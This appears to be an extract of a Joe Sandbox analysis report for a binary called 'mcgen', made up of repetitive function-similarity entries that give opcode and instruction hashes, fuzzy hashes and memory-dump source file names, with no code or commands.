                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: e+000$gfff
                                                                                                                                                                                                                                                                    • API String ID: 0-3030954782
                                                                                                                                                                                                                                                                    • Opcode ID: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                                    • Instruction ID: b83fe45f46fe692b85126f5bc5789e234f189f26aea3b973f7280b1e40f53039
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b62be3d0480bbbd0e022829aa0980c84d51f153df7fa61e27e52cad2b39beef0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6E516962F1C2C586E724CE39D8017697B96E744BA5F589231EBAC87AC5CF3DE445C700
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: gfffffff
                                                                                                                                                                                                                                                                    • API String ID: 0-1523873471
                                                                                                                                                                                                                                                                    • Opcode ID: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                                    • Instruction ID: 93c406f526b0da921b1c028045ff056d40b9045a82e4270c10f594f63f3e544e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bcab6200947a377332474fa44b4677218d40dcace4b26705986274372b0e4f91
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 50A14663A08BC646EB21CF29A4107A97B99EB607A5F058032EF8D8B785DE3DD509C711
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID: TMP
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                                                                    • Opcode ID: 206b8dd2323f0c32a07340ca02c5d8af7a3d2d7b1f0478edb605941266a0e502
                                                                                                                                                                                                                                                                    • Instruction ID: 270d96adeef7704d437ff070278859c1f52cfb1ac3df8482277db04f78f1f3ab
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 206b8dd2323f0c32a07340ca02c5d8af7a3d2d7b1f0478edb605941266a0e502
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 05518011F1C68241FA64AF3E59112BA7299AF84BE6F598434EF0EC77D6EE3CE4158201
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: HeapProcess
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 54951025-0
                                                                                                                                                                                                                                                                    • Opcode ID: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                                    • Instruction ID: ca7ff017ef88c378af58a7a6aba236e31548d94d091e8550658fce5748e0360a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 39e33fd4700d97162abc6aa121af668d241eeaeaed41ff08026f27548e358ff0
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 26B09B10E07A01C2E9051F396C8211412587F44752F544134C60C81730DD2C30E55701
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                                    • Instruction ID: d04358492fded295999bb139a7e4c71d2b6217695dcf1dd9cf7f0a0073550c83
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f2a1199bc68cddcf3b08423a19983f3afdde0c7e054ddf4c3f66946da216a90
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27D1F2A2A0C68287EB288E2D805077DB7A9EB05F69F144235EF1D87794DFBDE855C700
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                                    • Instruction ID: bf2b9d6d4c79dbc5f5487ee65d0c29a74f7753ceee18868f2f42664fb6707261
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 069bb313382d3adaff5ac451a95cb3dd74dda88d5dd80987c9f0d361d468a953
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6C1AE762181F08BD289EB29E46947A73D1F78A30EB95406BEF87477C6CB3CA414DB50
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                                    • Instruction ID: c9391c5a5f806ab3d82a9032e5999d242345105e4dae8c5d1c8bb7441ce359fc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2617fd8e8f043c0917c6a56c5cabdca8b91b1cd744d59a3c82f21f331bc63c74
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 34B17C72A18BC589EB688F2DC0502BC3BA8E749B69F680135EB4E87395CF39D451D740
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                                    • Instruction ID: a92ba5a7b1a5f0d9400ab63b76fd4fef7eb67b7a58256c59a49cb94d946a02e5
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 73948b09e9837a821f5a3b4bbb106c60bdc2a86aaa707f45330964650836ebfe
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C081D272A187C146E774CF1EA4443BA7E96FB457A5F244235EB9D87B99DE3CE4008B00
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3215553584-0
                                                                                                                                                                                                                                                                    • Opcode ID: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                                    • Instruction ID: d0bc1e67966e37b1ddf7db76d8f5f72e34d623b886df4089e54c7266412d8172
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2f230ee3a98ece7b192f4bc53182e7c18c75a4751ed7777c4a897db923149be4
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6861FD32E1C19246FB748EBC845A37D6688AF417B6F154239DB1DCBAD5DE7DE8008702
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                    • Instruction ID: b4e6e4ab18793597b31e0b07c740e783db9605c492d5674f8b91e41d3a8bdfc3
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 15515076B1869186E7248F2DC04033933A4EB55B79F248131EB4D97795DF3AE853CB44
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                    • Instruction ID: 5f7b4dea56d64911ffc821fd3cfccdd9825eceb7659d8dbfc9d18007b81c421a
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A514C76A1869186E7688F2DC0403B837A8EB55B79F244231EF8D977D4CF3AE852C740
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                    • Instruction ID: 5112f222acc4ae101a95773383e0a5d421c4c0326403c907949fbd033696eb33
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F5516376B28A9286E7248F2DD45032833A4EB44B79F248131EB4D8B794CF3AF852C744
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                                    • Instruction ID: 653ca95172c883ff5166f8825cd640d38ef3f6379314b18f19adeec4835cf434
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: FF51A276B1869586E7248F2DC08037837A9EB45B69F648131EF4C97798CF3AE843C744
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                                    • Instruction ID: deaa3f76c4fb510c0af04608f87be0ad85197d98b1dd63ff1c1793a04ab3eab1
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3B518F36B1869186E7248F2DD08037C37A9EB44B69F249131EF4D97798CF3AE852C784
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                                    • Instruction ID: 05797660e000809b362841b0a2a6fde8534fcc1450c7c01452cfdfde6369a969
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EF517136A1869186EB28CF2DC4407BD37A4EB58B69F244131EB4D977A4CF3AEC42C740
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2547618257.00007FF6B9F3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548290669.00007FF6B9F52000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2548473697.00007FF6B9F54000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_7ff6b9f10000_mcgen.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                    • Instruction ID: 6905d5b884b6ba48e2e90c1d0ec5f617480c3707c7c425a4ea32d8c5c147a7a6
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9A41B7B2C19BCA54EB658D2C09147B876889F62BB2D5852B0FF99DB3C3DD2C29878101
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2547481976.00007FF6B9F11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6B9F10000, based on PE: true
                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2546497099.00007FF6B9F10000.00000002.00000001.01000000.00000003.sdmpDownload File
